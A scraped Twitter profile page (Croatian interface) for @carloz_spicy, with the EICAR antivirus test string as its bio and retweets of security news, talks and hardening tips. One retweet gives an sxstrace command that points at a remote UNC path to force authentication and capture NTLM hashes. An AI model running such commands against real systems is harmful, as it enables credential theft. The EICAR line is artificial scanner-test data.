rvn_2p

@carloz_spicy

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Vrijeme pridruživanja: svibanj 2010.

Tweetovi

Blokirali ste korisnika/cu @carloz_spicy

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @carloz_spicy

  1. proslijedio/la je Tweet
    Poništi
  2. proslijedio/la je Tweet
    31. sij
    Poništi
  3. proslijedio/la je Tweet
    1. velj

    99 smartphones are transported in a handcart to generate virtual traffic jam in Google Maps. Through this activity, it is possible to turn a green street red which has an impact in the physical world by navigating cars on another route!

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    31. sij
    Poništi
  5. proslijedio/la je Tweet
    1. velj

    For those of you using a NV GPU with Volta or Turing chipset, listen up! We hacked our way into the post-48k GPU shared memory region. This improved bcrypt cracking performance by an average of 25%. For instance a GTX2080Ti improved from 42116 H/s to 54770 H/s

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    29. sij
    Poništi
  7. proslijedio/la je Tweet
    30. sij

    Uploaded my slides from "Attacking Jenkins" talk at : , blogpost will follow during the next days.

    Poništi
  8. proslijedio/la je Tweet
    30. sij

    Train with me and to find bugs and vulnerabilities in C systems software

    Poništi
  9. proslijedio/la je Tweet
    28. sij

    1. Windows Defender 2. EDR 3. Automated defanging of documents 4. Disabling macros, OLE, DDE, etc. 5. Disabling Windows Script Hosting 6. Private VLANs 7. Application whitelisting 8. Users not being local admins 9. 2FA on everything 10. Up-to-date patching

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    28. sij

    I'm looking for a new role doing something AppSec/Red Team/OSINT related in Seattle or remote. My strong suite is web and mobile security, with lots of bug bounty experience. My resume and contact info are on , DMs open as well. RT's are much appreciated.

    Poništi
  11. proslijedio/la je Tweet
    28. sij
    Odgovor korisniku/ci

    why our office is switching to Fortnite

    Poništi
  12. proslijedio/la je Tweet

    Big change coming to Windows Server this March - insecure LDAP requests will be rejected by default. That's a change in behaviour which will absolutely break things in some orgs How to get in front of the issue:

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    24. sij

    A new way to exfiltrate hash by forcing auth ? Check this : sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a   cc

    Poništi
  14. proslijedio/la je Tweet
    25. sij

    Ebenfalls neu in der Ausstellung.

    Poništi
  15. proslijedio/la je Tweet
    16. sij

    After a lot of work and some crypto-related delays, I couldn't be more proud to publish 's and mine latest research - The complete overview of CET internals on Windows (so far!):

    Poništi
  16. proslijedio/la je Tweet
    21. sij

    We released a Red Teaming book! Red Team Development and Operations. It's been a crazy project that has existed in many forms. It started as simple notes, came together as a SANS class, and will now live as a book. Read about it here.

    Poništi
  17. proslijedio/la je Tweet
    21. sij

    Friends, It has come to our attention a company is selling our malware samples. VXUG will never charge for it's data. Our current collection boasts a healthy 443,703 samples. New blocks of 20,000 added weekly. Free of charge. No IP logs. No cookies.

    Poništi
  18. proslijedio/la je Tweet
    15. sij

    Just published a blog explaining the root cause of the recent crypto vulnerability (CVE-2020-0601 / ?) using some "Load Bearing Analogies" to make it more accessible. CC:

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    20. sij

    Been waiting to announce: I'll be presenting "Forget the Sandbox Escape: Abusing Browsers from Code Execution" at this year's BluehatIL This talk will look at what attacks you can pull off in browsers without needing a sandbox escape I will also be demoing a POC of persistence

    Poništi
  20. proslijedio/la je Tweet
    17. sij

    Each year, on the windiest day of the year, the Dutch Headwind Cycling Championships take place on the Oosterscheldekering Storm Surge Barrier. Over 200 competitors ride the 8.5 km course against 100+ km/hr winds on upright single-speed bikes. Watch more:

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·